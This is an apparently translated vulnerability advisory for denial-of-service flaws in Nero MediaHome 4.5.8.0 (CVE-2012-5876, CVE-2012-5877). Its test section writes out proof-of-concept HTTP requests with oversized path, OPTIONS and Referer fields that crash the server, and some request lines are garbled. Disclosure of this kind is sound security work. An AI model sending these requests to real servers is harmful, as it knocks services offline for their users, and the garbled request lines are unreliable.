Release date:
Updated on:
Affected Systems:
Nero MediaHome 4.5.8.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57253
CVE (CAN) ID: CVE-2012-5876, CVE-2012-5877
Nero MediaHome is a media server component in the Nero kit that allows you to share media files in the LAN.
Nero MediaHome 4.5.8.0 and other versions have multiple denial-of-service vulnerabilities, which can cause application crash after successful exploitation.
<* Source: High-Tech Bridge Security Research Lab
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
GET/[A x 500000] HTTP/1.1
HOST: www.example.com
ACCEPT :*/*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
GET/[A x 500000] HTTP/1.1
HOST: www.example.com
ACCEPT :*/*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
OPTIONS/[A * 265712]
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us, en; q = 0.5
Keep-Alive: 300
Referer: http://www.example1.com
GET, HTTP, 1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us, en; q = 0.5
Keep-Alive: 300
Connection: keep-alive
Referer: [A * 265566]
GET, HTTP, 1.1
: Www.example.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us, en; q = 0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example1.com
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Nero
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.nero.com